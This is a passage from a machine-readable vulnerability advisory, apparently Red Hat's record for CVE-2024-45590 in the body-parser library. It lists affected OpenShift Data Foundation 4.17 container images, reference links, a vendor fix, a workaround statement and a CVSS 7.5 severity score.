"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", 